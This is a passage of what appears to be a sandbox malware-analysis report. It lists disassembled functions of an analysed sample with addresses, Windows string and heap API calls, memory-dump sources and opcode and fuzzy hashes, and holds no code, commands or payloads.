                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy
                            • String ID:
                            • API String ID: 3722407311-0
                            • Opcode ID: d6be6554accd031ce7d206edfe7d70fc6b713d160bc588bdcf76e43f90cad6b7
                            • Instruction ID: 564bf56aa466d337a64c0290495239b20082752436927ca9a15becd5faa70a9f
                            • Opcode Fuzzy Hash: d6be6554accd031ce7d206edfe7d70fc6b713d160bc588bdcf76e43f90cad6b7
                            • Instruction Fuzzy Hash: E6122A70A112059FDB28CF2AC554B25B7E4FF44718B29C0AEE909DB3A2D776DD82CB40
                            Function 008F7D60 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                            Download Yara Rule
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 008F7DD4
                            • std::_Xinvalid_argument.LIBCPMT ref: 008F7DEF
                              • Part of subcall function 008F7E80: std::_Xinvalid_argument.LIBCPMT ref: 008F7E98
                              • Part of subcall function 008F7E80: std::_Xinvalid_argument.LIBCPMT ref: 008F7EB6
                              • Part of subcall function 008F7E80: std::_Xinvalid_argument.LIBCPMT ref: 008F7ED1
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Xinvalid_argumentstd::_
                            • String ID: string too long
                            • API String ID: 909987262-2556327735
                            • Opcode ID: e54f875e8a323f4ecad06f503fe11e038f22b58de743769f8de75ceaf8d6bce0
                            • Instruction ID: ddc2f19a61678de034f0b0ef647764fdf5600f94f3032173e32fc74f2b197798
                            • Opcode Fuzzy Hash: e54f875e8a323f4ecad06f503fe11e038f22b58de743769f8de75ceaf8d6bce0
                            • Instruction Fuzzy Hash: 3231D6723086188BF724AD7CE88097AF7E9FF91B647604A2BF241CB685D7719C4083E5
                            Function 008E6EF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000008,?), ref: 008E6F74
                            • RtlAllocateHeap.NTDLL(00000000), ref: 008E6F7B
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateProcess
                            • String ID: @
                            • API String ID: 1357844191-2766056989
                            • Opcode ID: 2e7e4b90020bbf71b5426f5096a6522822dd81527ba9a7304aab30f11bd9a373
                            • Instruction ID: 33865249752ea42088325e2dc0a30f13bfd9a466be26a12c868cd486ad1eb5c9
                            • Opcode Fuzzy Hash: 2e7e4b90020bbf71b5426f5096a6522822dd81527ba9a7304aab30f11bd9a373
                            • Instruction Fuzzy Hash: 3721ACB06007419BEB208B62DC84BB673E8FB52744F848868F946CBA80FB74E945C755
                            Function 009025D0 Relevance: 5.2, APIs: 4, Instructions: 234stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 0090261C
                            • lstrlen.KERNEL32(00000000), ref: 009026B9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00902740
                            • lstrlen.KERNEL32(00000000), ref: 00902747
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen
                            • String ID:
                            • API String ID: 2001356338-0
                            • Opcode ID: 4e867a2ae9cd1d52ef63c9a6c738c222a8344019cc6e1c1724c65dd8eef480dc
                            • Instruction ID: 7bfcd382a81ce6423c133b8050bb7b3fb39aa497e9f0d423a4a1bc866c88194c
                            • Opcode Fuzzy Hash: 4e867a2ae9cd1d52ef63c9a6c738c222a8344019cc6e1c1724c65dd8eef480dc
                            • Instruction Fuzzy Hash: AE81B1B1E0020A9FDB14DB94DC48BAEB7B9FF94300F248069E904A73C1EB759D45CB95
                            Function 008E1530 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 008E1610: lstrcpy.KERNEL32(00000000), ref: 008E162D
                              • Part of subcall function 008E1610: lstrcpy.KERNEL32(00000000,?), ref: 008E164F
                              • Part of subcall function 008E1610: lstrcpy.KERNEL32(00000000,?), ref: 008E1671
                              • Part of subcall function 008E1610: lstrcpy.KERNEL32(00000000,?), ref: 008E1693
                            • lstrcpy.KERNEL32(00000000,?), ref: 008E1557
                            • lstrcpy.KERNEL32(00000000,?), ref: 008E1579
                            • lstrcpy.KERNEL32(00000000,?), ref: 008E159B
                            • lstrcpy.KERNEL32(00000000,?), ref: 008E15FF
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy
                            • String ID:
                            • API String ID: 3722407311-0
                            • Opcode ID: af304a9f09cf0485b3bc3276647328deb5b7019392f3c51aa62ea9ef2cabca66
                            • Instruction ID: a248d5e569a95a39877a289472bd54e1e0e91fd9e25e07e0786a857efac4b1eb
                            • Opcode Fuzzy Hash: af304a9f09cf0485b3bc3276647328deb5b7019392f3c51aa62ea9ef2cabca66
                            • Instruction Fuzzy Hash: 0B31E874A01B82AFCB24DF3AC598956BBF5FF4A704740492DA896C3B10DB70F861CB80
                            Function 00901740 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000), ref: 00901771
                            • lstrcpy.KERNEL32(00000000,?), ref: 009017A9
                            • lstrcpy.KERNEL32(00000000,?), ref: 009017E1
                            • lstrcpy.KERNEL32(00000000,?), ref: 00901819
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy
                            • String ID:
                            • API String ID: 3722407311-0
                            • Opcode ID: dc13919defd4e78136c022ceb48ff741fef4b50f931463257867997493ae65e4
                            • Instruction ID: 6ab346667cea289acf79bb03d3faa08f3fbc2d6cf5e6a910b3ef98dabba1891f
                            • Opcode Fuzzy Hash: dc13919defd4e78136c022ceb48ff741fef4b50f931463257867997493ae65e4
                            • Instruction Fuzzy Hash: 8C21D774601B429FD728EF7AD858A17B7ECFF45700B048A2CE886C7A81DB70E851CB91
                            Function 008E1610 Relevance: 5.1, APIs: 4, Instructions: 57stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000), ref: 008E162D
                            • lstrcpy.KERNEL32(00000000,?), ref: 008E164F
                            • lstrcpy.KERNEL32(00000000,?), ref: 008E1671
                            • lstrcpy.KERNEL32(00000000,?), ref: 008E1693
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy
                            • String ID:
                            • API String ID: 3722407311-0
                            • Opcode ID: e10d65a047e388270b272341a26f6c06a34ea26a2e153d0757b0739908df9efc
                            • Instruction ID: e27ef4953b76bdba96803c3b4fd8582bb4e195f374481cc58ba396b3c12f7bb4
                            • Opcode Fuzzy Hash: e10d65a047e388270b272341a26f6c06a34ea26a2e153d0757b0739908df9efc
                            • Instruction Fuzzy Hash: 3A1151B4A11782ABCB24AF3BD41C926B7FCFF56701748492DA886C3A50EB30E851CB50